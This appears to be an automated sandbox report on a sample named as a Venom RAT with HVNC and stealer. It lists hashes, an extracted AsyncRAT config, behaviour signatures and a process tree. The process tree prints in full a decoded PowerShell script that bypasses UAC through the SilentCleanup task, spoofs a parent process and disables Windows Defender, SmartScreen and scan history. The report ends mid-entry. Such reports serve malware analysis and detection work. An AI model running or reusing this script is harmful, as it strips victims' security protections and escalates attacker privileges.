Resubmissions

27-01-2025 23:39

250127-3ndh3szje1 10

27-01-2025 23:31

250127-3hqapayrby 10

27-01-2025 23:17

250127-29nqhayngz 10

Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    27-01-2025 23:17

General

  • Target

    Venom RAT + HVNC + Stealer + Grabber.exe

  • Size

    14.2MB

  • MD5

    3b3a304c6fc7a3a1d9390d7cbff56634

  • SHA1

    e8bd5244e6362968f5017680da33f1e90ae63dd7

  • SHA256

    7331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58

  • SHA512

    7f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5

  • SSDEEP

    196608:Nja6chUZX81lbFklbYJygrP7aIBhLkNPFCZZwiJl1NLIsPA8fxvuIMzd/95UhS14:qT+P+Zw6NLIsFfskh1BmXG04

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

127.0.0.1:4449

Mutex

jqftepbovsiy

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 1 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 48 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 42 IoCs
  • Suspicious use of SendNotifyMessage 29 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:704
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
        2⤵
        • Modifies Windows Defender DisableAntiSpyware settings
        • Modifies Windows Defender Real-time Protection settings
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3124
        • C:\Windows\system32\sc.exe
          "C:\Windows\system32\sc.exe" qc windefend
          3⤵
          • Launches sc.exe
          PID:1908
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
          3⤵
            PID:4112
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:396
          • C:\Windows\system32\net1.exe
            "C:\Windows\system32\net1.exe" stop windefend
            3⤵
              PID:4840
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
              3⤵
              • Launches sc.exe
              PID:2668
        • C:\Users\Admin\AppData\Local\Temp\Venom RAT + HVNC + Stealer + Grabber.exe
          "C:\Users\Admin\AppData\Local\Temp\Venom RAT + HVNC + Stealer + Grabber.exe"
          1⤵
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          PID:404
        • C:\Windows\system32\wbem\WmiApSrv.exe
          C:\Windows\system32\wbem\WmiApSrv.exe
          1⤵
            PID:796
          • C:\Users\Admin\Desktop\Client.exe
            "C:\Users\Admin\Desktop\Client.exe"
            1⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4408
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
              2⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4020
              • C:\Windows\system32\sc.exe
                "C:\Windows\system32\sc.exe" qc windefend
                3⤵
                • Launches sc.exe
                PID:4656
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                3⤵
                  PID:1404
                • C:\Windows\system32\whoami.exe
                  "C:\Windows\system32\whoami.exe" /groups
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1472
                • C:\Windows\system32\net1.exe
                  "C:\Windows\system32\net1.exe" start TrustedInstaller
                  3⤵
                    PID:3068
                  • C:\Windows\system32\net1.exe
                    "C:\Windows\system32\net1.exe" start lsass
                    3⤵
                      PID:3100
                  • C:\Windows\explorer.exe
                    "C:\Windows\explorer.exe"
                    2⤵
                    • Boot or Logon Autostart Execution: Active Setup
                    • Drops desktop.ini file(s)
                    • Enumerates connected drives
                    • Checks SCSI registry key(s)
                    • Modifies registry class
                    • Suspicious behavior: GetForegroundWindowSpam
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:4168
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1 4448 HVNC_MUTEX
                    2⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4528
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio
                      3⤵
                      • Drops file in Windows directory
                      • Enumerates system info in registry
                      • Modifies data under HKEY_USERS
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:1092
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\VenHide /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\VenHide --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd3e86cc40,0x7ffd3e86cc4c,0x7ffd3e86cc58
                        4⤵
                          PID:680
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1756,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2
                          4⤵
                            PID:1444
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --field-trial-handle=1896,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=1860 /prefetch:3
                            4⤵
                              PID:1576
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --field-trial-handle=2000,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:8
                              4⤵
                                PID:1572
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2824,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=2844 /prefetch:1
                                4⤵
                                  PID:4240
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2848,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=2880 /prefetch:1
                                  4⤵
                                    PID:3756
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --extension-process --no-appcompat-clear --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3284,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=3240 /prefetch:2
                                    4⤵
                                      PID:3060
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --extension-process --no-appcompat-clear --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3464,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=3772 /prefetch:2
                                      4⤵
                                        PID:3068
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3840,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=3920 /prefetch:1
                                        4⤵
                                          PID:3160
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --field-trial-handle=3272,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=4152 /prefetch:8
                                          4⤵
                                            PID:5408
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --field-trial-handle=4364,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=4376 /prefetch:8
                                            4⤵
                                              PID:5512
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4388,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:1
                                              4⤵
                                                PID:5520
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-appcompat-clear --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4408,i,18349317215823796998,4134242961614715135,262144 --variations-seed-version --mojo-platform-channel-handle=4488 /prefetch:1
                                                4⤵
                                                  PID:5532
                                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe
                                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
                                                  4⤵
                                                  • Drops file in Windows directory
                                                  PID:5840
                                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe
                                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x260,0x264,0x268,0x23c,0x26c,0x7ff699594698,0x7ff6995946a4,0x7ff6995946b0
                                                    5⤵
                                                    • Drops file in Windows directory
                                                    PID:5932
                                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe
                                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe" --system-level --verbose-logging --installerdata="C:\Program Files\Google\Chrome\Application\initial_preferences" --create-shortcuts=1 --install-level=0
                                                    5⤵
                                                    • Drops file in Windows directory
                                                    • Modifies registry class
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:5984
                                                    • C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe
                                                      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x260,0x264,0x268,0x23c,0x26c,0x7ff699594698,0x7ff6995946a4,0x7ff6995946b0
                                                      6⤵
                                                      • Drops file in Windows directory
                                                      PID:6004
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
